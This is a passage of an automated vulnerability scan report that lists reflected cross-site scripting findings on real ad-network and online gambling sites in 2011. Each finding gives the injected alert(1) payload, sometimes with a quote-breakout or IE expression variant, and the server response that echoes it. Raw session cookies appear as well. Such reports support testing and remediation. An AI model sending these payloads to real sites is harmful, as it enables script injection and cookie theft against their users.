Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; ih="b!!!!$!.`.U!!!!#<y'ux!2$8S!!!!#<y'ui"; bh="b!!!!m!!Zwa!!!!#=!DU4!!ry1!!!!#=!msQ!!uoE!!!!(=!>P_!##!O!!!!#=!DU4!#*.a!!!!#=!o!R!#*VS!!!!#=!o!R!#*Xc!!!!#=!07,!#0%H!!!!#=!msS!#1*0!!!!#=!DU4!#1*h!!!!#=!DU4!#3pS!!!!#=!gBG!#3pv!!!!#=!gBG!#5(U!!!!#=!o!R!#5(W!!!!#=!07,!#5(X!!!!#=!o!R!#5(Y!!!!#=!gBG!#5(_!!!!#=!07,!#5(a!!!!#=!gBG!#5(c!!!!#=!o!R!#5(f!!!!#=!o!R!#C)^!!!!#=!Vkm!#Ie7!!!!#=!dO*!#T?O!!!!#=!dO*!#VSs!!!!#=!o!R!#Zb$!!!!#=!DU4!#Zbt!!!!#=!DU4!#b9/!!!!#<uEax!#b<Z!!!!#=!07,!#b<d!!!!#=!o!R!#b<e!!!!#=!gBG!#b<g!!!!#=!gBG!#b<i!!!!#=!gBG!#b<m!!!!#=!07,!#b<p!!!!#=!07,!#b<s!!!!#=!085!#b<t!!!!#=!085!#b='!!!!#=!gBG!#b?f!!!!#=!msI!#dxJ!!!!#=!DU4!#dxO!!!!#=!DU4!#g:`!!!!#=!DU4!#g=D!!!!#=!DU4!#gar!!!!#=!DU4!#h.N!!!!%=!>qI!#ncR!!!!#=!DU4!#sDa!!!!#=!$y[!#s`9!!!!#=!$y[!#s`=!!!!#=!$yh!#s`?!!!!#=!$yh!#s`D!!!!#=!$y[!#sa7!!!!#=!%!=!#sa:!!!!#=!%!=!#saD!!!!#=!%!=!#sgK!!!!#=!$y[!#sgS!!!!#=!$y[!#sgU!!!!#=!$y[!#sgV!!!!#=!$yh!#vA$!!!!#=!DU4!#x??!!!!'=!nv,!#yGL!!!!#=!DU4!$#4B!!!!#=!DU4!$#4C!!!!#=!DU4!$#4E!!!!#=!DU4!$#?.!!!!#=!Vki!$'?p!!!!#=!$y[!$'AB!!!!#=!$y[!$'AP!!!!#=!$y[!$'AR!!!!#=!$y[!$'AU!!!!#=!$yh!$'AY!!!!#=!%!=!$'L<!!!!#=!$y[!$(Tb!!!!#=!/l7"; uid=uid=c08a423c-7b10-11e0-8d2f-7fbc75b135eb&_hmacv=1&_salt=419862129&_keyid=k1&_hmac=80f2e481993e14f9e9c2e53c8bcda8051c813d3e

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:33 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 12:52:33 GMT
Pragma: no-cache
Content-Length: 4324
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?31b6f"-alert(1)-"f1e62c14a44=1&Z=728x90&s=1703625&_salt=3404908760";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar
...[SNIP]...

3.26. http://bid.openx.net/json [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload aba86<script>alert(1)</script>c1e227c2a98 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_6670393876aba86<script>alert(1)</script>c1e227c2a98&pid=d6536fd1-a88d-43f5-b56c-d55966e08548&s=728x90&f=0.56&url=http%3A%2F%2Fad.doubleclick.net%2FN6707%2Fadi%2Fmeta.homepage%2FadminMsg%3Bpos%3Dfooter%3Bsz%3D728x90%3Batf%3Dno%3Bname%3Dleaderboardfooter%3BpageURL%3Dwww.metacafe.com%252Ffplayer%252F%253F4702d%2522%253E%253Cscript%253Ealert%2528document.cookie%2529%253C%252Fscript%253Ebe96a23f3a3%253D1%3Bstudio%3Dnull%3Bsection%3Dnull%3Bcategory%3Dnull%3Bchannel%3Dnull%3Brating%3Dclean%3Bhd%3Dno%3Benv%3Dprod%3Bbranding%3Dnull%3Bfbconnected%3Dfalse%3Bffilter%3Dtrue%3Breferrer%3Dnull%3BLEID%3D40%3Btile%3D9%3Bord%3D4284276430058379&cid=oxpv1%3A34-632-1929-1558-4408&hrid=b7d3130441279250d437d1e5dbea5016-1305550329 HTTP/1.1
Host: bid.openx.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: i=de6f5b1d-dd7a-4d95-8142-2b91139d25bd; p=1305468134

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=282eed89-72f0-45c6-8111-20529e7e7fdf; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1305550335; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_6670393876aba86<script>alert(1)</script>c1e227c2a98({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAI3PvU7DMBAH8H-TNnXtli4FxMB3JyQjp06MP
...[SNIP]...

3.27. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtb50.doubleverify.com
Path:   /rtb.ashx/verifyc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4a935<script>alert(1)</script>c320f4b1392 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rtb.ashx/verifyc?ctx=741233&cmp=5384441&plc=62171182&sid=1037707&num=5&ver=2&dv_url=http%3A//ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg%3Bpos%3Dfooter%3Bsz%3D728x90%3Batf%3Dno%3Bname%3Dleaderboardfooter%3BpageURL%3Dwww.metacafe.com%252Ffplayer%252F%253F4702d%2522%253E%253Cscript%253Ealert%2528document.cookie%2529%253C%252Fscript%253Ebe96a23f3a3%253D1%3Bstudio%3Dnull%3Bsection%3Dnull%3Bcategory%3Dnull%3Bchannel%3Dnull%3Brating%3Dclean%3Bhd%3Dno%3Benv%3Dprod%3Bbranding%3Dnull%3Bfbconnected%3Dfalse%3Bffilter%3Dtrue%3Breferrer%3Dnull%3BLEID%3D40%3Btile%3D9%3Bord%3D4284276430058379&callback=__verify_callback_3834651037884a935<script>alert(1)</script>c320f4b1392 HTTP/1.1
Host: rtb50.doubleverify.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 16 May 2011 12:52:00 GMT
Connection: close
Content-Length: 74

__verify_callback_3834651037884a935<script>alert(1)</script>c320f4b1392(2)

3.28. http://scratch.co.uk/ [currency parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the currency request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f52a7"><script>alert(1)</script>f3c08612d87 was submitted in the currency parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?currency=USDf52a7"><script>alert(1)</script>f3c08612d87 HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: currency=USDf52a7%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef3c08612d87; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:27 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USDf52a7"><script>alert(1)</script>f3c08612d87', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.29. http://scratch.co.uk/ [currency parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the currency request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 737fc"%3balert(1)//814391c7445 was submitted in the currency parameter. This input was echoed as 737fc";alert(1)//814391c7445 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?currency=USD737fc"%3balert(1)//814391c7445 HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%281%29%2F%2F814391c7445; expires=Wed, 15-Jun-2011 12:25:27 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:27 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<script type="text/javascript">
$(document).ready(function() {
flashembed("middleflash", {src: "/images/scratch3a.swf?clickTag=javascript:openScratch('USD737fc";alert(1)//814391c7445', 'ENG', 'direct-173|193|214|243');", w3c: true, wmode: "transparent"}, {
monthlyprizetext: 'Won Last Month',
               monthlyprize: '&pound;53,521,715',
               topprizetext: 'Scratch &pound
...[SNIP]...

3.30. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [CUR parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/Lobby.aspx

Issue detail

The value of the CUR request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef230'%3balert(1)//49f697934b was submitted in the CUR parameter. This input was echoed as ef230';alert(1)//49f697934b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/Lobby.aspx?CUR=GBPef230'%3balert(1)//49f697934b&CSI=20&LNG=~ENG&BD=home.okscratchcards.com&SDN=okscratchcards.com&CKI= HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dxeuyd55fuapfle5trgjlp45; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19499


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
UserName='-';
       var PlayMode='';
       var LastPage='-';
var Gender = '';
var Depositor = '';
var LastDepositStatus = '';
var ErrorCode='';
var Currency='GBPef230';alert(1)//49f697934b';
var Language='ENG';
       var iFrameIndex=0;

   var bRequestedClose = false; //Flag to indicate a close request to prevent double close of the window
   function ReloadPage(pLanguageCode,pCur
...[SNIP]...

3.31. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [PRD parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/Lobby.aspx

Issue detail

The value of the PRD request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d09da'%3balert(1)//698914ca5c0 was submitted in the PRD parameter. This input was echoed as d09da';alert(1)//698914ca5c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/Lobby.aspx?CSI=17&SKI=0&CUR=EUR&LNG=SPA&AFI=17&MMI=0&PRD=d09da'%3balert(1)//698914ca5c0&UNIQUEVISITORID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AR=&PAR=&BD=www.mundirasca.com&SDN=MundiRasca.com&CORID=&SENTDATE=&COREXPDATE=&GID=&RegistrationMode= HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xlhekov0yyaqd345yzm2mh55; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19818


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
,'EUR','SPA','17','0','','','','',1,4,5,100,'','','MundiRasca.com','..y+%c2%a1cambia+tu+suerte!','MundiRasca.com','www.mundirasca.com','', '&UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7','','','','d09da';alert(1)//698914ca5c0',"")
                        </script>
...[SNIP]...

3.32. https://secure.neogames-tech.com/ScratchCards/Lobby.aspx [UNIQUEVISITORID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/Lobby.aspx

Issue detail

The value of the UNIQUEVISITORID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac3b5'%3balert(1)//0fdbb5aef4f was submitted in the UNIQUEVISITORID parameter. This input was echoed as ac3b5';alert(1)//0fdbb5aef4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/Lobby.aspx?CSI=17&SKI=0&CUR=EUR&LNG=SPA&AFI=17&MMI=0&PRD=&UNIQUEVISITORID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7ac3b5'%3balert(1)//0fdbb5aef4f&AR=&PAR=&BD=www.mundirasca.com&SDN=MundiRasca.com&CORID=&SENTDATE=&COREXPDATE=&GID=&RegistrationMode= HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ar2sx145gmevit45fudsrcn4; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19818


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
#2c62a0','0','EUR','SPA','17','0','','','','',1,4,5,100,'','','MundiRasca.com','..y+%c2%a1cambia+tu+suerte!','MundiRasca.com','www.mundirasca.com','', '&UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7ac3b5';alert(1)//0fdbb5aef4f','','','','',"")
                        </script>
...[SNIP]...

3.33. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [AR parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/lobby.aspx

Issue detail

The value of the AR request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8abcd'%3balert(1)//fdbdc8c0c01 was submitted in the AR parameter. This input was echoed as 8abcd';alert(1)//fdbdc8c0c01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301378abcd'%3balert(1)//fdbdc8c0c01&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3s4ea145uzdvo2upuhtuo3rc; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19556


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
tedClose = true; //prevent the "close request" when we change the language
       window.location.replace('Lobby.aspx?CSI=3&SKI=0&AFI=3&MMI=0&CUR=' + pCurrencyCode + '&LNG=~' + pLanguageCode + '&AR=1301378abcd';alert(1)//fdbdc8c0c01&PAR=0'+'&Refresh=1' + '&WID=');
   }
       
   //send player events notification
   function TimerGetPlayerEvents()
   {
try
{
    if(UserName!='-')
{
            var h
...[SNIP]...

3.34. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BD parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/lobby.aspx

Issue detail

The value of the BD request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 190db"style%3d"x%3aexpression(alert(1))"f1e0058e238 was submitted in the BD parameter. This input was echoed as 190db"style="x:expression(alert(1))"f1e0058e238 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /ScratchCards/lobby.aspx?BD=info.Winnings.com190db"style%3d"x%3aexpression(alert(1))"f1e0058e238&SDN=Winnings.com&LNG=~ENG&CUR=GBP&CSI=21 HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=j3jz3quzo4m0ga55rqwealiz; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19506


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
<meta content="info.Winnings.com190db"style="x:expression(alert(1))"f1e0058e238, The Best online scratch games in the world, More then 20 amazing online scratch games. Winnings &amp; change your day!!!" name="description" />
...[SNIP]...

3.35. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BD parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/lobby.aspx

Issue detail

The value of the BD request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a3b8'%3balert(1)//8816847b473 was submitted in the BD parameter. This input was echoed as 4a3b8';alert(1)//8816847b473 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/lobby.aspx?BD=info.Winnings.com4a3b8'%3balert(1)//8816847b473&SDN=Winnings.com&LNG=~ENG&CUR=GBP&CSI=21 HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=liapwh45d4ztmuyumndgtc45; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19445


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
<script language="javascript">
                            LoadLobby('21','#2f82b6','0','GBP','ENG','0','0','','','','',1,4,5,100,'','','Winnings.com','','Winnings.com','info.Winnings.com4a3b8';alert(1)//8816847b473','', '','','','','',"")
                        </script>
...[SNIP]...

3.36. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BO parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/lobby.aspx

Issue detail

The value of the BO request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f0b9'%3balert(1)//c208a0401a was submitted in the BO parameter. This input was echoed as 3f0b9';alert(1)//c208a0401a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/lobby.aspx?CSI=28&LNG=ENG&CUR=GBP&RegistrationMode=PM&BO=FM3f0b9'%3balert(1)//c208a0401a&BD=info.crazyscratch.com&SDN=CrazyScratch.com& HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cqorslb3q0irn1uxhyakm555; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19503


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
<script language="javascript">
                            LoadLobby('28','#7dda4d','0','GBP','ENG','0','0','','','','',1,4,5,100,'PM','FM3f0b9';alert(1)//c208a0401a','CrazyScratch.com','It\'s+money+madness!','CrazyScratch','info.crazyscratch.com','', '','','','','',"")
                        </script>
...[SNIP]...

3.37. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [PAR parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/lobby.aspx

Issue detail

The value of the PAR request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68d70'%3balert(1)//3f67c728a9b was submitted in the PAR parameter. This input was echoed as 68d70';alert(1)//3f67c728a9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137&AFI=3&PAR=068d70'%3balert(1)//3f67c728a9b&BD=primescratchcards.com&SDN=primescratchcards.com HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=oqzkg255itycuma3lquknh55; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19556


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
se = true; //prevent the "close request" when we change the language
       window.location.replace('Lobby.aspx?CSI=3&SKI=0&AFI=3&MMI=0&CUR=' + pCurrencyCode + '&LNG=~' + pLanguageCode + '&AR=130137&PAR=068d70';alert(1)//3f67c728a9b'+'&Refresh=1' + '&WID=');
   }
       
   //send player events notification
   function TimerGetPlayerEvents()
   {
try
{
    if(UserName!='-')
{
            var httpRes
...[SNIP]...

